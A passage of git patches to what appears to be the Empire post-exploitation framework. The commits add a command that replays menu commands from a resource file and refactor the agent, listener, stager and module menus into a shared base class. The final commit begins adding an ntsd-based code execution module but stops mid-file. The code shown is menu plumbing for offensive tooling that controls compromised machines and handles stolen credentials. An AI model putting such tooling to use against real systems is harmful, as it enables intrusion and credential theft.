self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -2311,7 +2311,7 @@ class PythonAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2363,7 +2363,7 @@ class PythonAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -2712,8 +2712,6 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) -## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: -## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2853,7 +2851,7 @@ class ListenersMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -2880,9 +2878,10 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): + print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + print 6 def do_agents(self, line): "Jump to the Agents menu." @@ -3078,7 +3077,7 @@ class ListenerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -3094,7 +3093,7 @@ class ListenerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3269,7 +3268,7 @@ class ModuleMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -3344,7 +3343,7 @@ class ModuleMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3678,7 +3677,7 @@ class StagerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def validate_options(self): @@ -3720,7 +3719,7 @@ class StagerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." From 753c2e20de4c3b57cf17d57bf2062fdd13d34db2 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:53:32 -0600 Subject: [PATCH 07/50] added resource file functionality as in Metasploit --- lib/common/empire.py | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 4584aba..da7a7af 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -956,6 +956,10 @@ class AgentsMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -1618,6 +1622,10 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2419,6 +2427,10 @@ class PythonAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2892,6 +2904,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3109,6 +3125,10 @@ class ListenerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3359,6 +3379,10 @@ class ModuleMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3735,6 +3759,10 @@ class StagerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." From 67483f40081b9002a191dc9f0e7a1cd2d7b536c3 Mon Sep 17 00:00:00 2001 From: xorrior Date: Thu, 12 Oct 2017 18:26:09 -0400 Subject: [PATCH 08/50] Update Version string --- lib/common/empire.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 5d08e9e..08a07dc 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -9,7 +9,7 @@ menu loops. """ # make version for Empire -VERSION = "2.1" +VERSION = "2.2" from pydispatch import dispatcher From 16267f983c2a7f12364f500f744f7acf34e17461 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 16:29:51 -0600 Subject: [PATCH 09/50] removed debug statements --- lib/common/empire.py | 4 ---- 1 file changed, 4 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index da7a7af..3dee134 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2890,10 +2890,8 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): - print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - print 6 def do_agents(self, line): "Jump to the Agents menu." @@ -3836,7 +3834,6 @@ class StagerMenu(cmd.Cmd): def do_generate(self, line): "Generate/execute the given Empire stager." - if not self.validate_options(): return @@ -3867,7 +3864,6 @@ class StagerMenu(cmd.Cmd): os.chmod(savePath, 777) print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)) - else: print stagerOutput From 7f4988e951d2f89f842c2a514555e2afc80dd789 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 21:28:45 -0600 Subject: [PATCH 10/50] added help text for resource command --- lib/common/empire.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 3dee134..ec08771 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -391,6 +391,7 @@ class MainMenu(cmd.Cmd): pass def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) @@ -957,6 +958,7 @@ class AgentsMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -1623,6 +1625,7 @@ class PowerShellAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2428,6 +2431,7 @@ class PythonAgentMenu(cmd.Cmd): messages.display_agent(agent) def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -2903,6 +2907,7 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3124,6 +3129,7 @@ class ListenerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3378,6 +3384,7 @@ class ModuleMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -3758,6 +3765,7 @@ class StagerMenu(cmd.Cmd): raise NavMain() def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) From 8a1d076d14fdfeca1d1a9705d9c6b07fd95f3cbe Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:31:35 -0600 Subject: [PATCH 11/50] refactoring submenu's to not duplicate so much code --- lib/common/empire.py | 434 ++++++------------------------------------- 1 file changed, 56 insertions(+), 378 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ec08771..0344f70 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -229,11 +229,6 @@ class MainMenu(cmd.Cmd): print helpers.color("[!] Please run database_setup.py") sys.exit() - - # def preloop(self): - # traceback.print_stack() - - def cmdloop(self): """ The main cmdloop logic that handles navigation to other menus. @@ -899,38 +894,13 @@ class MainMenu(cmd.Cmd): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in options if s.startswith(mline)] - -class AgentsMenu(cmd.Cmd): - """ - The main class used by Empire to drive the 'agents' menu. - """ +class SubMenu(cmd.Cmd): + def __init__(self, mainMenu): cmd.Cmd.__init__(self) - self.mainMenu = mainMenu - self.doc_header = 'Commands' - - # set the prompt text - self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' - - messages.display_agents(self.mainMenu.agents.get_agents_db()) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) @@ -940,19 +910,19 @@ class AgentsMenu(cmd.Cmd): pass def postcmd(self, stop, line): + if line == "back": + return True if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): - "Go back to the main menu." - raise NavMain() - + "Go back a menu." + return True def do_listeners(self, line): "Jump to the listeners menu." raise NavListeners() - def do_main(self, line): "Go back to the main menu." raise NavMain() @@ -967,6 +937,41 @@ class AgentsMenu(cmd.Cmd): "Exit Empire." raise KeyboardInterrupt + def do_creds(self, line): + "Display/return credentials from the database." + self.mainMenu.do_creds(line) + + # print a nicely formatted help menu + # stolen/adapted from recon-ng + def print_topics(self, header, commands, cmdlen, maxcol): + if commands: + self.stdout.write("%s\n" % str(header)) + if self.ruler: + self.stdout.write("%s\n" % str(self.ruler * len(header))) + for command in commands: + self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) + self.stdout.write("\n") + + # def preloop(self): + # traceback.print_stack() + +class AgentsMenu(SubMenu): + """ + The main class used by Empire to drive the 'agents' menu. + """ + def __init__(self, mainMenu): + SubMenu.__init__(self, mainMenu) + + self.doc_header = 'Commands' + + # set the prompt text + self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + + messages.display_agents(self.mainMenu.agents.get_agents_db()) + + def do_back(self, line): + "Go back to the main menu." + raise NavMain() def do_list(self, line): "Lists all active agents (or listeners)." @@ -978,7 +983,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.do_list("agents " + str(line)) - def do_rename(self, line): "Rename a particular agent." @@ -1035,12 +1039,6 @@ class AgentsMenu(cmd.Cmd): except KeyboardInterrupt: print '' - - def do_creds(self, line): - "Display/return credentials from the database." - self.mainMenu.do_creds(line) - - def do_clear(self, line): "Clear one or more agent's taskings." @@ -1434,7 +1432,7 @@ class AgentsMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class AgentMenu(cmd.Cmd): +class AgentMenu(SubMenu): """ An abstracted class used by Empire to determine which agent menu type to instantiate. @@ -1452,15 +1450,14 @@ class AgentMenu(cmd.Cmd): else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) -class PowerShellAgentMenu(cmd.Cmd): +class PowerShellAgentMenu(SubMenu): """ The main class used by Empire to drive an individual 'agent' menu. """ def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) - self.mainMenu = mainMenu self.sessionID = sessionID self.doc_header = 'Agent Commands' @@ -1482,11 +1479,6 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): # traceback.print_stack() @@ -1520,23 +1512,6 @@ class PowerShellAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" @@ -1556,30 +1531,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Command not recognized.") print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." @@ -1587,8 +1538,7 @@ class PowerShellAgentMenu(cmd.Cmd): print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n" else: - cmd.Cmd.do_help(self, *args) - + SubMenu.do_help(self, *args) def do_list(self, line): "Lists all active agents (or listeners)." @@ -1600,7 +1550,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_rename(self, line): "Rename the agent." @@ -1616,7 +1565,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please enter a new name for the agent") - def do_info(self, line): "Display information about this agent" @@ -1624,12 +1572,6 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - def do_exit(self, line): "Task agent to exit." @@ -2293,13 +2235,11 @@ class PowerShellAgentMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class PythonAgentMenu(cmd.Cmd): +class PythonAgentMenu(SubMenu): def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.sessionID = sessionID @@ -2320,13 +2260,6 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - # def preloop(self): - # traceback.print_stack() - def handle_agent_event(self, signal, sender): """ Handle agent event signals. @@ -2346,54 +2279,13 @@ class PythonAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, cmds, cmdlen, maxcol): - if cmds: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for c in cmds: - self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" print helpers.color("[!] Command not recognized, use 'help' to see available commands") - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." - cmd.Cmd.do_help(self, *args) + SubMenu.do_help(self, *args) def do_list(self, line): @@ -2848,14 +2740,12 @@ class PythonAgentMenu(cmd.Cmd): # return helpers.complete_path(text,line) -class ListenersMenu(cmd.Cmd): +class ListenersMenu(SubMenu): """ The main class used by Empire to drive the 'listener' menu. """ def __init__(self, mainMenu): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.doc_header = 'Listener Commands' @@ -2865,58 +2755,10 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def do_back(self, line): "Go back to the main menu." raise NavMain() - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "List all active listeners (or agents)." @@ -3074,13 +2916,11 @@ class ListenersMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class ListenerMenu(cmd.Cmd): +class ListenerMenu(SubMenu): def __init__(self, mainMenu, listenerName): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) if listenerName not in self.mainMenu.listeners.loadedListeners: print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)) @@ -3094,51 +2934,6 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - def emptyline(self): - """ - If any empty line is entered, do nothing. - """ - pass - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_info(self, line): "Display listener module options." messages.display_listener_module(self.listener) @@ -3263,15 +3058,14 @@ class ListenerMenu(cmd.Cmd): return [s[offs:] for s in languages if s.startswith(mline)] -class ModuleMenu(cmd.Cmd): +class ModuleMenu(SubMenu): """ The main class used by Empire to drive the 'module' menu. """ def __init__(self, mainMenu, moduleName, agent=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Module Commands' - self.mainMenu = mainMenu try: # get the current module/name @@ -3290,14 +3084,6 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - - # def preloop(self): - # traceback.print_stack() - def validate_options(self): "Ensure all required module options are completed." @@ -3344,56 +3130,6 @@ class ModuleMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." @@ -3404,7 +3140,6 @@ class ModuleMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_reload(self, line): "Reload the current module." @@ -3681,16 +3416,14 @@ class ModuleMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class StagerMenu(cmd.Cmd): +class StagerMenu(SubMenu): """ The main class used by Empire to drive the 'stager' menu. """ def __init__(self, mainMenu, stagerName, listener=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Stager Menu' - self.mainMenu = mainMenu - # get the current stager name self.stagerName = stagerName self.stager = self.mainMenu.stagers.stagers[stagerName] @@ -3704,11 +3437,6 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener - def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - cmd.Cmd.cmdloop(self) - def validate_options(self): "Make sure all required stager options are completed." @@ -3725,56 +3453,6 @@ class StagerMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - def postcmd(self, stop, line): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." From 0485b2b6fdbd4652b9d5730bb9fc9a060cc2bbd8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 10:45:55 -0600 Subject: [PATCH 12/50] can call agents from any submenu now --- lib/common/empire.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index c34eed6..91b843a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -925,6 +925,10 @@ class SubMenu(cmd.Cmd): "Jump to the listeners menu." raise NavListeners() + def do_agents(self, line): + "Jump to the agents menu." + raise NavAgents() + def do_main(self, line): "Go back to the main menu." raise NavMain() From 23de7bc71ac0581aaba2dd23f2df42cc9793e015 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Fri, 13 Oct 2017 21:13:25 -0600 Subject: [PATCH 13/50] removing duplicate method --- lib/common/empire.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 91b843a..b2b5090 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2328,11 +2328,6 @@ class PythonAgentMenu(SubMenu): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_resource(self, arg): - "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." From 999970e96aeb04db11bd24ea2fdc346a9cc82d2c Mon Sep 17 00:00:00 2001 From: root Date: Mon, 16 Oct 2017 10:23:41 -0400 Subject: [PATCH 14/50] pushing module for ntsd code exec --- .../code_execution/Invoke-Ntsd.ps1 | 8 + data/module_source/code_execution/ntsd.exe | Bin 0 -> 98760 bytes .../module_source/code_execution/ntsdexts.dll | Bin 0 -> 85448 bytes .../powershell/code_execution/invoke_ntsd.py | 155 ++++++++++++++++++ 4 files changed, 163 insertions(+) create mode 100644 data/module_source/code_execution/Invoke-Ntsd.ps1 create mode 100644 data/module_source/code_execution/ntsd.exe create mode 100644 data/module_source/code_execution/ntsdexts.dll create mode 100644 lib/modules/powershell/code_execution/invoke_ntsd.py diff --git a/data/module_source/code_execution/Invoke-Ntsd.ps1 b/data/module_source/code_execution/Invoke-Ntsd.ps1 new file mode 100644 index 0000000..988347b --- /dev/null +++ b/data/module_source/code_execution/Invoke-Ntsd.ps1 @@ -0,0 +1,8 @@ + +Function 